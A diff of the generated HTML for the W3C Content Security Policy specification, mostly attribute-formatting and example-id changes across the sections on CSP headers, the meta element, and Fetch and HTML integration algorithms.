       <p>Let <var>violation</var> be the result of executing <a href="#create-violation-for-global">§2.4.1 Create a violation object for global, policy, and directive</a> on <var>request</var>’s <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-request-client" id="ref-for-concept-request-client">client</a>’s <a data-link-type="dfn" href="https://html.spec.whatwg.org/multipage/webappapis.html#concept-settings-object-global" id="ref-for-concept-settings-object-global">global object</a>, <var>policy</var>, and <var>directive</var>.</p>
-     <li data-md>
+     <li data-md="">
       <p>Set <var>violation</var>’s <a data-link-type="dfn" href="#violation-resource" id="ref-for-violation-resource①">resource</a> to <var>request</var>’s <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-request-url" id="ref-for-concept-request-url">url</a>.</p>
       <p class="note" role="note"><span>Note:</span> We use <var>request</var>’s <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-request-url" id="ref-for-concept-request-url①">url</a>, and <em>not</em> its <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-request-current-url" id="ref-for-concept-request-current-url">current url</a>, as the latter might contain information
   about redirect targets to which the page MUST NOT be given access.</p>
-     <li data-md>
+     <li data-md="">
       <p>Return <var>violation</var>.</p>
     </ol>
    </section>
@@ -2330,15 +2283,15 @@ ISSUE: Bikeshed <code>unsafe-allow-redirects</code>.
   and HTML is described in <a href="#fetch-integration">§4.1 Integration with Fetch</a> and <a href="#html-integration">§4.2 Integration with HTML</a>.</p>
     <p>A <a data-link-type="dfn" href="#content-security-policy-object" id="ref-for-content-security-policy-object②①">policy</a> may also be declared inline in an HTML document via a <code><a data-link-type="element" href="https://html.spec.whatwg.org/multipage/semantics.html#meta" id="ref-for-meta">meta</a></code> element’s <code><a data-link-type="element-sub" href="https://html.spec.whatwg.org/multipage/semantics.html#attr-meta-http-equiv" id="ref-for-attr-meta-http-equiv">http-equiv</a></code> attribute, as described in <a href="#meta-element">§3.3 The &lt;meta> element</a>.</p>
     <h3 class="heading settled" data-level="3.1" id="csp-header"><span class="secno">3.1. </span><span class="content"> The <code>Content-Security-Policy</code> HTTP Response Header Field </span><a class="self-link" href="#csp-header"></a></h3>
-    <p>The <dfn class="dfn-paneled" data-dfn-type="http-header" data-export id="header-content-security-policy"><code>Content-Security-Policy</code></dfn> HTTP response header field is the preferred mechanism for delivering a policy from a server to a
+    <p>The <dfn class="dfn-paneled" data-dfn-type="http-header" data-export="" id="header-content-security-policy"><code>Content-Security-Policy</code></dfn> HTTP response header field is the preferred mechanism for delivering a policy from a server to a
   client. The header’s value is represented by the following ABNF <a data-link-type="biblio" href="#biblio-rfc5234">[RFC5234]</a>:</p>
 <pre>Content-Security-Policy = 1#<a data-link-type="grammar" href="#grammardef-serialized-policy" id="ref-for-grammardef-serialized-policy①">serialized-policy</a>
                     ; The '#' rule is the one defined in section 7 of RFC 7230
                     ; but it incorporates the modifications specified
                     ; in section 2.1 of this document.
 </pre>
-    <div class="example" id="example-b2d2c295">
-     <a class="self-link" href="#example-b2d2c295"></a> 
+    <div class="example" id="example-cc966e28">
+     <a class="self-link" href="#example-cc966e28"></a> 
 <pre><a data-link-type="http-header" href="#header-content-security-policy" id="ref-for-header-content-security-policy①">Content-Security-Policy</a>: script-src 'self';
                          report-to csp-reporting-endpoint
 </pre>
@@ -2351,7 +2304,7 @@ ISSUE: Bikeshed <code>unsafe-allow-redirects</code>.
     <p>When the user agent receives a <code>Content-Security-Policy</code> header field, it
   MUST <a data-link-type="abstract-op" href="#abstract-opdef-parse-a-serialized-csp" id="ref-for-abstract-opdef-parse-a-serialized-csp①">parse</a> and <a data-link-type="dfn" href="#enforced" id="ref-for-enforced">enforce</a> each <a data-link-type="dfn" href="#serialized-csp" id="ref-for-serialized-csp④">serialized CSP</a> it contains as described in <a href="#fetch-integration">§4.1 Integration with Fetch</a>, <a href="#html-integration">§4.2 Integration with HTML</a>.</p>
     <h3 class="heading settled" data-level="3.2" id="cspro-header"><span class="secno">3.2. </span><span class="content"> The <code>Content-Security-Policy-Report-Only</code> HTTP Response Header Field </span><a class="self-link" href="#cspro-header"></a></h3>
-    <p>The <dfn class="dfn-paneled" data-dfn-type="http-header" data-export id="header-content-security-policy-report-only"><code>Content-Security-Policy-Report-Only</code></dfn> HTTP response header field allows web developers to experiment with policies by monitoring (but
+    <p>The <dfn class="dfn-paneled" data-dfn-type="http-header" data-export="" id="header-content-security-policy-report-only"><code>Content-Security-Policy-Report-Only</code></dfn> HTTP response header field allows web developers to experiment with policies by monitoring (but
   not enforcing) their effects. The header’s value is represented by the following ABNF <a data-link-type="biblio" href="#biblio-rfc5234">[RFC5234]</a>:</p>
 <pre>Content-Security-Policy-Report-Only = 1#<a data-link-type="grammar" href="#grammardef-serialized-policy" id="ref-for-grammardef-serialized-policy②">serialized-policy</a>
                     ; The '#' rule is the one defined in section 7 of RFC 7230
@@ -2362,8 +2315,8 @@ ISSUE: Bikeshed <code>unsafe-allow-redirects</code>.
   an iterative fashion, deploying a report-only policy based on their best
   estimate of how their site behaves, watching for violation reports, and then
   moving to an enforced policy once they’ve gained confidence in that behavior.</p>
-    <div class="example" id="example-5899b4f0">
-     <a class="self-link" href="#example-5899b4f0"></a> 
+    <div class="example" id="example-971dbae8">
+     <a class="self-link" href="#example-971dbae8"></a> 
 <pre><a data-link-type="http-header" href="#header-content-security-policy-report-only" id="ref-for-header-content-security-policy-report-only">Content-Security-Policy-Report-Only</a>: script-src 'self';
                                      report-to csp-reporting-endpoint
 </pre>
@@ -2379,9 +2332,9 @@ ISSUE: Bikeshed <code>unsafe-allow-redirects</code>.
     <h3 class="heading settled" data-level="3.3" id="meta-element"><span class="secno">3.3. </span><span class="content"> The <code>&lt;meta></code> element </span><a class="self-link" href="#meta-element"></a></h3>
     <p>A <code class="idl"><a data-link-type="idl" href="https://dom.spec.whatwg.org/#document" id="ref-for-document③">Document</a></code> may deliver a policy via one or more HTML <code><a data-link-type="element" href="https://html.spec.whatwg.org/multipage/semantics.html#meta" id="ref-for-meta②">meta</a></code> elements
   whose <code><a data-link-type="element-sub" href="https://html.spec.whatwg.org/multipage/semantics.html#attr-meta-http-equiv" id="ref-for-attr-meta-http-equiv①">http-equiv</a></code> attributes are an <a data-link-type="dfn" href="https://infra.spec.whatwg.org/#ascii-case-insensitive" id="ref-for-ascii-case-insensitive">ASCII case-insensitive</a> match for the string "<code>Content-Security-Policy</code>". For example:</p>
-    <div class="example" id="example-5b9d2837">
-     <a class="self-link" href="#example-5b9d2837"></a> 
-<pre class="highlight"><c- p>&lt;</c-><c- f>meta</c-> <c- e>http-equiv</c-><c- o>=</c-><c- s>"Content-Security-Policy"</c-> <c- e>content</c-><c- o>=</c-><c- s>"script-src 'self'"</c-><c- p>></c->
+    <div class="example" id="example-f977fbdb">
+     <a class="self-link" href="#example-f977fbdb"></a> 
+<pre class="highlight"><span class="p">&lt;</span><span class="nt">meta</span> <span class="na">http-equiv</span><span class="o">=</span><span class="s">"Content-Security-Policy"</span> <span class="na">content</span><span class="o">=</span><span class="s">"script-src 'self'"</span><span class="p">></span>
 </pre>
     </div>
     <p>Implementation details can be found in HTML’s <a data-link-type="dfn" href="https://html.spec.whatwg.org/multipage/semantics.html#attr-meta-http-equiv-content-security-policy" id="ref-for-attr-meta-http-equiv-content-security-policy">Content Security Policy
@@ -2414,12 +2367,12 @@ ISSUE: Bikeshed <code>unsafe-allow-redirects</code>.
   or allowed, and about whether a particular <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-response" id="ref-for-concept-response④">response</a> should be replaced
   with a <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-network-error" id="ref-for-concept-network-error">network error</a>.</p>
     <ol>
-     <li data-md>
+     <li data-md="">
       <p><a href="#should-block-request">§4.1.3 Should request be blocked by Content Security Policy?</a> is called as part of step 2.4 of the <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-main-fetch" id="ref-for-concept-main-fetch">Main
   Fetch</a> algorithm. This allows directives' <a data-link-type="dfn" href="#directive-pre-request-check" id="ref-for-directive-pre-request-check">pre-request checks</a> to be executed against each <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-request" id="ref-for-concept-request⑦">request</a> before it hits the network,
   and against each redirect that a <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-request" id="ref-for-concept-request⑧">request</a> might go through on its
   way to reaching a resource.</p>
-     <li data-md>
+     <li data-md="">
       <p><a href="#should-block-response">§4.1.4 Should response to request be blocked by Content Security Policy?</a> is called as part of step 11 of the <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-main-fetch" id="ref-for-concept-main-fetch①">Main
   Fetch</a> algorithm. This allows directives' <a data-link-type="dfn" href="#directive-post-request-check" id="ref-for-directive-post-request-check">post-request checks</a> and <a data-link-type="dfn" href="#directive-response-check" id="ref-for-directive-response-check">response checks</a> to be executed on the <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-response" id="ref-for-concept-response⑤">response</a> delivered
   from the network or from a Service Worker.</p>
@@ -2428,10 +2381,10 @@ ISSUE: Bikeshed <code>unsafe-allow-redirects</code>.
   user agent needs to <a data-link-type="abstract-op" href="#abstract-opdef-parse-a-serialized-csp" id="ref-for-abstract-opdef-parse-a-serialized-csp③">parse</a> any policy
   delivered via an HTTP response header field before any <a data-link-type="dfn" href="https://html.spec.whatwg.org/multipage/webappapis.html#global-object" id="ref-for-global-object⑤">global object</a> is created in order to handle directives that require knowledge of a <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-response" id="ref-for-concept-response⑥">response</a>’s details. To that end:</p>
     <ol>
-     <li data-md>
+     <li data-md="">
       <p>A <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-response" id="ref-for-concept-response⑦">response</a> has an associated <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-response-csp-list" id="ref-for-concept-response-csp-list">CSP list</a> which
   contains any policy objects delivered in the <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-response" id="ref-for-concept-response⑧">response</a>’s <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-response-header-list" id="ref-for-concept-response-header-list">header list</a>.</p>
-     <li data-md>
+     <li data-md="">
       <p><a href="#set-response-csp-list">§4.1.1 Set response’s CSP list</a> is called in the <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-http-fetch" id="ref-for-concept-http-fetch">HTTP fetch</a> and <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-http-network-fetch" id="ref-for-concept-http-network-fetch">HTTP-network fetch</a> algorithms.</p>
       <p class="note" role="note"><span>Note:</span> These two calls should ensure that a <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-response" id="ref-for-concept-response⑨">response</a>’s <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-response-csp-list" id="ref-for-concept-response-csp-list①">CSP list</a> is set, regardless of how the <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-response" id="ref-for-concept-response①⓪">response</a> is created. If we hit the network (via <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-http-network-fetch" id="ref-for-concept-http-network-fetch①">HTTP-network
   fetch</a>, then we parse the policy before we handle the <code>Set-Cookie</code> header. If we get a response from a Service Worker (via <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-http-fetch" id="ref-for-concept-http-fetch①">HTTP fetch</a>,
@@ -2445,18 +2398,18 @@ ISSUE: Bikeshed <code>unsafe-allow-redirects</code>.
     <p>Given a <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-response" id="ref-for-concept-response①①">response</a> (<var>response</var>), this algorithm evaluates its <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-response-header-list" id="ref-for-concept-response-header-list①">header list</a> for <a data-link-type="dfn" href="#serialized-csp" id="ref-for-serialized-csp⑥">serialized CSP</a> values, and
   populates its <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-response-csp-list" id="ref-for-concept-response-csp-list③">CSP list</a> accordingly:</p>
     <ol class="algorithm">
-     <li data-md>
+     <li data-md="">
       <p>Set <var>response</var>’s <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-response-csp-list" id="ref-for-concept-response-csp-list④">CSP list</a> to the empty list.</p>
-     <li data-md>
+     <li data-md="">
       <p>Let <var>policies</var> be the result of <a data-link-type="abstract-op" href="#abstract-opdef-parse-a-serialized-csp-list" id="ref-for-abstract-opdef-parse-a-serialized-csp-list">parsing</a> the result of <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#extract-header-list-values" id="ref-for-extract-header-list-values">extracting header list values</a> given <code>Content-Security-Policy</code> and <var>response</var>’s <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-response-header-list" id="ref-for-concept-response-header-list②">header list</a>, with a <a data-link-type="dfn" href="#policy-source" id="ref-for-policy-source⑤">source</a> of "<code>header</code>", and a <a data-link-type="dfn" href="#policy-disposition" id="ref-for-policy-disposition⑤">disposition</a> of "<code>enforce</code>".</p>
-     <li data-md>
+     <li data-md="">
       <p>Append to <var>policies</var> the result of <a data-link-type="abstract-op" href="#abstract-opdef-parse-a-serialized-csp-list" id="ref-for-abstract-opdef-parse-a-serialized-csp-list①">parsing</a> the result of <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#extract-header-list-values" id="ref-for-extract-header-list-values①">extracting header list values</a> given <code>Content-Security-Policy-Report-Only</code> and <var>response</var>’s <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-response-header-list" id="ref-for-concept-response-header-list③">header list</a>, with a <a data-link-type="dfn" href="#policy-source" id="ref-for-policy-source⑥">source</a> of "<code>header</code>", and a <a data-link-type="dfn" href="#policy-disposition" id="ref-for-policy-disposition⑥">disposition</a> of "<code>report</code>".</p>
-     <li data-md>
+     <li data-md="">
       <p>For each <var>policy</var> in <var>policies</var>:</p>
       <ol>
-       <li data-md>
+       <li data-md="">
         <p>Set <var>policy</var>’s <a data-link-type="dfn" href="#policy-self-origin" id="ref-for-policy-self-origin">self-origin</a> to <var>response</var>’s <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-response-url" id="ref-for-concept-response-url">url</a>'s <a data-link-type="dfn" href="https://url.spec.whatwg.org/#concept-url-origin" id="ref-for-concept-url-origin">origin</a>.</p>
-       <li data-md>
+       <li data-md="">
         <p>Insert <var>policy</var> into <var>response</var>’s <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-response-csp-list" id="ref-for-concept-response-csp-list⑤">CSP list</a>.</p>
       </ol>
     </ol>
@@ -2464,66 +2417,66 @@ ISSUE: Bikeshed <code>unsafe-allow-redirects</code>.
     <p>Given a <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-request" id="ref-for-concept-request⑨">request</a> (<var>request</var>), this algorithm reports violations based
   on <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-request-client" id="ref-for-concept-request-client①">client</a>’s "report only" policies.</p>
     <ol>
-     <li data-md>
+     <li data-md="">
       <p>Let <var>CSP list</var> be <var>request</var>’s <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-request-client" id="ref-for-concept-request-client②">client</a>’s <a data-link-type="dfn" href="https://html.spec.whatwg.org/multipage/webappapis.html#concept-settings-object-global" id="ref-for-concept-settings-object-global①">global object</a>’s <a data-link-type="dfn" href="#global-object-csp-list" id="ref-for-global-object-csp-list①">CSP list</a>.</p>
-     <li data-md>
+     <li data-md="">
       <p>For each <var>policy</var> in <var>CSP list</var>:</p>
       <ol>
-       <li data-md>
+       <li data-md="">
         <p>If <var>policy</var>’s <a data-link-type="dfn" href="#policy-disposition" id="ref-for-policy-disposition⑦">disposition</a> is "<code>enforce</code>",
   then skip to the next <var>policy</var>.</p>
-       <li data-md>
+       <li data-md="">
         <p>Let <var>violates</var> be the result of executing <a href="#does-request-violate-policy">§6.6.2.1 Does request violate policy?</a> on <var>request</var> and <var>policy</var>.</p>
-       <li data-md>
+       <li data-md="">
         <p>If <var>violates</var> is not "<code>Does Not Violate</code>", then execute <a href="#report-violation">§5.3 Report a violation</a> on the result of executing <a href="#create-violation-for-request">§2.4.2 Create a violation object for request, and policy.</a> on <var>request</var>, and <var>policy</var>.</p>
       </ol>
     </ol>
     <h4 class="heading settled algorithm" data-algorithm="Should request be blocked by Content Security Policy?" data-level="4.1.3" id="should-block-request"><span class="secno">4.1.3. </span><span class="content"> Should <var>request</var> be blocked by Content Security Policy? </span><a class="self-link" href="#should-block-request"></a></h4>
     <p>Given a <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-request" id="ref-for-concept-request①⓪">request</a> (<var>request</var>), this algorithm returns <code>Blocked</code> or <code>Allowed</code> and reports violations based on <var>request</var>’s <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-request-client" id="ref-for-concept-request-client③">client</a>’s Content Security Policy.</p>
     <ol>
-     <li data-md>
+     <li data-md="">
       <p>Let <var>CSP list</var> be <var>request</var>’s <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-request-client" id="ref-for-concept-request-client④">client</a>’s <a data-link-type="dfn" href="https://html.spec.whatwg.org/multipage/webappapis.html#concept-settings-object-global" id="ref-for-concept-settings-object-global②">global object</a>’s <a data-link-type="dfn" href="#global-object-csp-list" id="ref-for-global-object-csp-list②">CSP list</a>.</p>
-     <li data-md>
+     <li data-md="">
       <p>Let <var>result</var> be "<code>Allowed</code>".</p>
-     <li data-md>
+     <li data-md="">
       <p>For each <var>policy</var> in <var>CSP list</var>:</p>
       <ol>
-       <li data-md>
+       <li data-md="">
         <p>If <var>policy</var>’s <a data-link-type="dfn" href="#policy-disposition" id="ref-for-policy-disposition⑧">disposition</a> is "<code>report</code>",
   then skip to the next <var>policy</var>.</p>
-       <li data-md>
+       <li data-md="">
         <p>Let <var>violates</var> be the result of executing <a href="#does-request-violate-policy">§6.6.2.1 Does request violate policy?</a> on <var>request</var> and <var>policy</var>.</p>
-       <li data-md>
+       <li data-md="">
         <p>If <var>violates</var> is not "<code>Does Not Violate</code>", then:</p>
         <ol>
-         <li data-md>
+         <li data-md="">
           <p>Execute <a href="#report-violation">§5.3 Report a violation</a> on the result of executing <a href="#create-violation-for-request">§2.4.2 Create a violation object for request, and policy.</a> on <var>request</var>, and <var>policy</var>.</p>
-         <li data-md>
+         <li data-md="">
           <p>Set <var>result</var> to "<code>Blocked</code>".</p>
         </ol>
       </ol>
-     <li data-md>
+     <li data-md="">
       <p>Return <var>result</var>.</p>
     </ol>
     <h4 class="heading settled algorithm" data-algorithm="Should response to request be blocked by Content Security Policy?" data-level="4.1.4" id="should-block-response"><span class="secno">4.1.4. </span><span class="content"> Should <var>response</var> to <var>request</var> be blocked by Content Security Policy? </span><a class="self-link" href="#should-block-response"></a></h4>
     <p>Given a <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-response" id="ref-for-concept-response①②">response</a> (<var>response</var>) and a <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-request" id="ref-for-concept-request①①">request</a> (<var>request</var>), this algorithm returns <code>Blocked</code> or <code>Allowed</code>, and reports violations based on <var>request</var>’s <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-request-client" id="ref-for-concept-request-client⑤">client</a>’s Content Security Policy.</p>
     <ol>
-     <li data-md>
+     <li data-md="">
       <p>Let <var>CSP list</var> be <var>request</var>’s <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-request-client" id="ref-for-concept-request-client⑥">client</a>’s <a data-link-type="dfn" href="https://html.spec.whatwg.org/multipage/webappapis.html#concept-settings-object-global" id="ref-for-concept-settings-object-global③">global object</a>’s <a data-link-type="dfn" href="#global-object-csp-list" id="ref-for-global-object-csp-list③">CSP list</a>.</p>
-     <li data-md>
+     <li data-md="">
       <p>Let <var>result</var> be "<code>Allowed</code>".</p>
-     <li data-md>
+     <li data-md="">
       <p>For each <var>policy</var> in <var>CSP list</var>:</p>
       <ol>
-       <li data-md>
+       <li data-md="">
         <p>For each <var>directive</var> in <var>policy</var>:</p>
         <ol>
-         <li data-md>
+         <li data-md="">
           <p>If the result of executing <var>directive</var>’s <a data-link-type="dfn" href="#directive-post-request-check" id="ref-for-directive-post-request-check①">post-request check</a> is "<code>Blocked</code>", then:</p>
           <ol>
-           <li data-md>
+           <li data-md="">
             <p>Execute <a href="#report-violation">§5.3 Report a violation</a> on the result of executing <a href="#create-violation-for-request">§2.4.2 Create a violation object for request, and policy.</a> on <var>request</var>, and <var>policy</var>.</p>
-           <li data-md>
+           <li data-md="">
             <p>If <var>policy</var>’s <a data-link-type="dfn" href="#policy-disposition" id="ref-for-policy-disposition⑨">disposition</a> is "<code>enforce</code>",
   then set <var>result</var> to "<code>Blocked</code>".</p>
           </ol>
@@ -2532,19 +2485,19 @@ ISSUE: Bikeshed <code>unsafe-allow-redirects</code>.
       <p class="note" role="note"><span>Note:</span> This portion of the check verifies that the page can load the
   response. That is, that a Service Worker hasn’t substituted a file which
   would violate the page’s CSP.</p>
-     <li data-md>
+     <li data-md="">
       <p>For each <var>policy</var> in <var>response</var>’s <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-response-csp-list" id="ref-for-concept-response-csp-list⑥">CSP list</a>:</p>
       <ol>
-       <li data-md>
+       <li data-md="">
         <p>For each <var>directive</var> in <var>policy</var>:</p>
         <ol>
-         <li data-md>
+         <li data-md="">
           <p>If the result of executing <var>directive</var>’s <a data-link-type="dfn" href="#directive-response-check" id="ref-for-directive-response-check①">response check</a> on <var>request</var>, <var>response</var>,
   and <var>policy</var> is "<code>Blocked</code>", then:</p>
           <ol>
-           <li data-md>
+           <li data-md="">
             <p>Execute <a href="#report-violation">§5.3 Report a violation</a> on the result of executing <a href="#create-violation-for-request">§2.4.2 Create a violation object for request, and policy.</a> on <var>request</var>, and <var>policy</var>.</p>
-           <li data-md>
+           <li data-md="">
             <p>If <var>policy</var>’s <a data-link-type="dfn" href="#policy-disposition" id="ref-for-policy-disposition①⓪">disposition</a> is "<code>enforce</code>",
   then set <var>result</var> to "<code>Blocked</code>".</p>
           </ol>
@@ -2552,51 +2505,51 @@ ISSUE: Bikeshed <code>unsafe-allow-redirects</code>.
       </ol>
       <p class="note" role="note"><span>Note:</span> This portion of the check allows policies delivered with the
   response to determine whether the response is allowed to be delivered.</p>
-     <li data-md>
+     <li data-md="">
       <p>Return <var>result</var>.</p>
     </ol>
     <h3 class="heading settled" data-level="4.2" id="html-integration"><span class="secno">4.2. </span><span class="content"> Integration with HTML </span><a class="self-link" href="#html-integration"></a></h3>
     <ol>
-     <li data-md>
+     <li data-md="">
       <p>The <code class="idl"><a data-link-type="idl" href="https://dom.spec.whatwg.org/#document" id="ref-for-document④">Document</a></code>, <code class="idl"><a data-link-type="idl" href="https://html.spec.whatwg.org/multipage/workers.html#workerglobalscope" id="ref-for-workerglobalscope①">WorkerGlobalScope</a></code>, and <code class="idl"><a data-link-type="idl" href="https://drafts.css-houdini.org/worklets/#workletglobalscope" id="ref-for-workletglobalscope①">WorkletGlobalScope</a></code> objects have a <code>CSP list</code>, which holds all the <a data-link-type="dfn" href="#content-security-policy-object" id="ref-for-content-security-policy-object②③">policy</a> objects which are
   active for a given context. This list is empty unless otherwise specified,
   and is populated via the <a href="#initialize-global-object-csp">§4.2.2 Initialize a global object’s CSP list</a> and <a href="#initialize-document-csp">§4.2.1 Initialize a Document's CSP list</a> algorithms.</p>
-     <li data-md>
-      <p>A <a data-link-type="dfn" href="https://html.spec.whatwg.org/multipage/webappapis.html#global-object" id="ref-for-global-object⑦">global object</a>’s <dfn class="dfn-paneled" data-dfn-for="global object" data-dfn-type="dfn" data-noexport id="global-object-csp-list">CSP list</dfn> is the result of executing <a href="#get-csp-of-object">§4.2.3 Retrieve the CSP list of an object</a> with the <a data-link-type="dfn" href="https://html.spec.whatwg.org/multipage/webappapis.html#global-object" id="ref-for-global-object⑧">global object</a> as the <code>object</code>.</p>
-     <li data-md>
-      <p>A <a data-link-type="dfn" href="#content-security-policy-object" id="ref-for-content-security-policy-object②④">policy</a> is <dfn class="dfn-paneled" data-dfn-type="dfn" data-export id="enforced">enforced</dfn> or <dfn class="dfn-paneled" data-dfn-type="dfn" data-export id="monitored">monitored</dfn> for a <a data-link-type="dfn" href="https://html.spec.whatwg.org/multipage/webappapis.html#global-object" id="ref-for-global-object⑨">global object</a> by inserting it into the <a data-link-type="dfn" href="https://html.spec.whatwg.org/multipage/webappapis.html#global-object" id="ref-for-global-object①⓪">global object</a>’s <a data-link-type="dfn" href="#global-object-csp-list" id="ref-for-global-object-csp-list④">CSP list</a>.</p>
-     <li data-md>
+     <li data-md="">
+      <p>A <a data-link-type="dfn" href="https://html.spec.whatwg.org/multipage/webappapis.html#global-object" id="ref-for-global-object⑦">global object</a>’s <dfn class="dfn-paneled" data-dfn-for="global object" data-dfn-type="dfn" data-noexport="" id="global-object-csp-list">CSP list</dfn> is the result of executing <a href="#get-csp-of-object">§4.2.3 Retrieve the CSP list of an object</a> with the <a data-link-type="dfn" href="https://html.spec.whatwg.org/multipage/webappapis.html#global-object" id="ref-for-global-object⑧">global object</a> as the <code>object</code>.</p>
+     <li data-md="">
+      <p>A <a data-link-type="dfn" href="#content-security-policy-object" id="ref-for-content-security-policy-object②④">policy</a> is <dfn class="dfn-paneled" data-dfn-type="dfn" data-export="" id="enforced">enforced</dfn> or <dfn class="dfn-paneled" data-dfn-type="dfn" data-export="" id="monitored">monitored</dfn> for a <a data-link-type="dfn" href="https://html.spec.whatwg.org/multipage/webappapis.html#global-object" id="ref-for-global-object⑨">global object</a> by inserting it into the <a data-link-type="dfn" href="https://html.spec.whatwg.org/multipage/webappapis.html#global-object" id="ref-for-global-object①⓪">global object</a>’s <a data-link-type="dfn" href="#global-object-csp-list" id="ref-for-global-object-csp-list④">CSP list</a>.</p>
+     <li data-md="">
       <p><a href="#initialize-global-object-csp">§4.2.2 Initialize a global object’s CSP list</a> is called during the <a data-link-type="dfn" href="https://html.spec.whatwg.org/multipage/workers.html#run-a-worker" id="ref-for-run-a-worker">run a worker</a> algorithm in order to bind a set of <a data-link-type="dfn" href="#content-security-policy-object" id="ref-for-content-security-policy-object②⑤">policy</a> objects associated
   with a <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-response" id="ref-for-concept-response①③">response</a> <code class="idl"><a data-link-type="idl" href="https://html.spec.whatwg.org/multipage/workers.html#workerglobalscope" id="ref-for-workerglobalscope②">WorkerGlobalScope</a></code> or <code class="idl"><a data-link-type="idl" href="https://drafts.css-houdini.org/worklets/#workletglobalscope" id="ref-for-workletglobalscope②">WorkletGlobalScope</a></code>.</p>
-     <li data-md>
+     <li data-md="">
       <p><a href="#initialize-document-csp">§4.2.1 Initialize a Document's CSP list</a> is called during the <a data-link-type="dfn" href="https://html.spec.whatwg.org/multipage/browsing-the-web.html#initialise-the-document-object" id="ref-for-initialise-the-document-object">initializing a
   new <code>Document</code> object</a> algorithm in order to bind a set of <a data-link-type="dfn" href="#content-security-policy-object" id="ref-for-content-security-policy-object②⑥">policy</a> objects associated with a <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-response" id="ref-for-concept-response①④">response</a> to a newly created <code class="idl"><a data-link-type="idl" href="https://dom.spec.whatwg.org/#document" id="ref-for-document⑤">Document</a></code>.</p>
-     <li data-md>
+     <li data-md="">
       <p><a href="#should-block-inline">§4.2.4 Should element’s inline type behavior be blocked by Content Security Policy?</a> is called during the <a data-link-type="dfn" href="https://html.spec.whatwg.org/multipage/scripting.html#prepare-a-script" id="ref-for-prepare-a-script">prepare a script</a> and <a data-link-type="dfn" href="https://html.spec.whatwg.org/multipage/semantics.html#update-a-style-block" id="ref-for-update-a-style-block">update a <code>style</code> block</a> algorithms in order to determine whether or
   not an inline script or style block is allowed to execute/render.</p>
-     <li data-md>
+     <li data-md="">
       <p><a href="#should-block-inline">§4.2.4 Should element’s inline type behavior be blocked by Content Security Policy?</a> is called during handling of inline event
   handlers (like <code>onclick</code>) and inline <code>style</code> attributes in order to
   determine whether or not they ought to be allowed to execute/render.</p>
-     <li data-md>
+     <li data-md="">
       <p><a data-link-type="dfn" href="#content-security-policy-object" id="ref-for-content-security-policy-object②⑦">policy</a> is <a data-link-type="dfn" href="#enforced" id="ref-for-enforced①">enforced</a> during processing of the <code><a data-link-type="element" href="https://html.spec.whatwg.org/multipage/semantics.html#meta" id="ref-for-meta⑨">meta</a></code> element’s <code><a data-link-type="element-sub" href="https://html.spec.whatwg.org/multipage/semantics.html#attr-meta-http-equiv" id="ref-for-attr-meta-http-equiv②">http-equiv</a></code>.</p>
-     <li data-md>
-      <p>A <code class="idl"><a data-link-type="idl" href="https://dom.spec.whatwg.org/#document" id="ref-for-document⑥">Document</a></code>'s <dfn class="dfn-paneled" data-dfn-type="dfn" data-noexport id="embedding-document">embedding document</dfn> is the <code class="idl"><a data-link-type="idl" href="https://dom.spec.whatwg.org/#document" id="ref-for-document⑦">Document</a></code> <a data-link-type="dfn" href="https://html.spec.whatwg.org/multipage/browsers.html#browsing-context-nested-through" id="ref-for-browsing-context-nested-through">through which</a> the <code class="idl"><a data-link-type="idl" href="https://dom.spec.whatwg.org/#document" id="ref-for-document⑧">Document</a></code>'s <a data-link-type="dfn" href="https://html.spec.whatwg.org/multipage/browsers.html#browsing-context" id="ref-for-browsing-context①">browsing context</a> is nested.</p>
-     <li data-md>
+     <li data-md="">
